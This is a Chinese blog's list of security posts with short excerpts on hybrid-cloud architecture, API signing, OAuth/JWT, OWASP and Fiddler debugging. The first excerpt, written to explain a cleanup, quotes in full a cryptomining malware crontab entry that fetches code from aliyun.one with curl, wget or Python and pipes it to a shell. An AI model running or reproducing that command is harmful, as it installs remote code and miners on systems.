安全
江晓曼*凡云基地
静守己心,看淡浮华
展开
-
服务器中了挖矿病毒aliyun.one
服务器中了病毒*/15 * * * * (curl -fsSL -m180 aliyun.one||wget -q -T180 -O- aliyun.one||python -c 'import urllib;exec(urllib.urlopen("http://aliyun.one/pygo").read())')|sh解决方案:修改/etc/hosts,添加Host配置如下:...原创 2019-12-24 14:23:15 · 1091 阅读 · 0 评论 -
安全架构设计
安全是个相对的,安全是一种平衡。随着企业将更多的业务托管于混合云之上,保护用户数据和业务 变得更加困难。本地基础设施和多种公、私有云共同构成的复杂环境, 使得用户对混合云安全有了更高的要求。混合云安全能力体现在以下几方面: 网络和传输安全通过安全域划分、虚拟防火墙、VXLAN 等软件定义网络进行 网络隔离,避免不同平面的网络间相互影响;通过 HTTPS 等 安全通信协议、SS...原创 2019-10-22 16:28:55 · 2192 阅读 · 0 评论 -
Http Api安全通信
互联网互联互通时代,Http通讯协议开发者首选之一,那么如何确保Http Api安全高效通信,成为首当其冲的问题。安全方案一、采用加签验签方式进行API校验,保障API安全。安全方案二、登录校验,采用安全登录方式验证API,防止非登录态访问。缺点:需进行会话保持。安全方案三、OAuth或JWT机制,校验API安全。...原创 2019-08-15 10:17:05 · 257 阅读 · 0 评论 -
高深莫测的网络问题。。。
SLB、DNS、IP、端口、防火墙、白名单。。。到底是什么问题导致ping不通、服务不可用呢?答案是:一切皆有可能。每个环节都可能出错,如同墨菲定律所说,只要存在就有可能出错。场景一、SLB异常502 Bad Gateway The proxy server received an invalid response from an upstream server.场景二、DNS解析...原创 2019-08-14 15:30:16 · 251 阅读 · 0 评论 -
安全评测EAL3+级认证
现在,信息安全问题日益突出,安全事件屡屡发生。信息安全问题已经成为事关国家政治、经济、社会和国防安全的重大问题。对企业来说,软件产品设计是否全面、是否提供了足够的保密措施、保障文档是否完善显得至关重要。在安全方面,结合自身的设计、实现以及功能都遵从行业标准和政府法规,如ISO/IEC 15408、信息安全等级保护(GB 17859)、信息技术安全性评估准则(GB/T 18336)...原创 2018-07-25 08:21:57 · 10498 阅读 · 0 评论 -
Fidder工具抓包及篡改数据
下载fiddler的最新版本;运行fiddler之后测试要调试的页面是否可以捕获,刷新页面后左边列表会实时显示目前http请求的条目。如图红色部分测试成功,开始断点捕获数据点击菜单栏按钮【Rules】—【automatic Breakpoints】-【After Response】如图选择这一项的意思是我要在请求返回后修改返回结果当让你也可以在下转载 2017-03-31 17:09:03 · 20330 阅读 · 0 评论 -
JAVA安全
1.跨站脚本攻击XSS2.跨站请求伪造CSRF3.XXE Injection即XML External Entity Injection,也就是XML外部实体注入攻击.漏洞是在对非安全的外部实体数据进⾏行处理时引发的安全问题原创 2016-12-26 23:00:45 · 468 阅读 · 0 评论 -
Web应用安全威胁与防治--基于OWASP TOP 10 与ESAPI
ESAPI是owasp提供的一套API级别的web应用解决方案,本人通过对ESAPI和其提供的demo源码学习发现,关键的不是对其所提供的API的使用,而是其web应用安全防御体系的构建的思想。比如,您不一定要使用ESAPI去实现日志系统,而是应该明白,一套好的日志系统应该是怎么样子的,应具备什么样的特性等。此外,在引入使用时可能会遇到不少麻烦,所以读者应根据自身的业务特性和需求进行整合,而不转载 2017-05-05 09:06:53 · 4459 阅读 · 0 评论 -
Http Token
{ "code" : 0, "msg" : "成功", "data" : { "access_token" : "4afacff4cc699f70e1ff89d7debe6be1b8e242d94f1c18cf675432fec3e2706f", "expires_in" : 7200 }}原创 2017-05-11 15:35:58 · 782 阅读 · 0 评论 -
安全认证机制
1、HTTP简单基本认证方式 这个是早期交互用得比较多的一种方式,主要是使用用户名和密码来交互,由于在每次的交互中,用户名和密码都会暴露给第三方,那么这么做是不可取的,风险十分大,所以这种认证方式并没有流传开来 2、OAuth(OAuth2) 这个就是开放平台的概念,就像你登录第三方网站或者app的时候可以使用qq或者微信登录,那么登录后第三方可以获取你的个人信息,这就是开放授权的概念转载 2017-04-06 18:50:08 · 406 阅读 · 0 评论 -
JWT技术详解
1、服务器发送事件(Server-Sent Events)2、jjwt原创 2017-04-07 11:16:29 · 1312 阅读 · 0 评论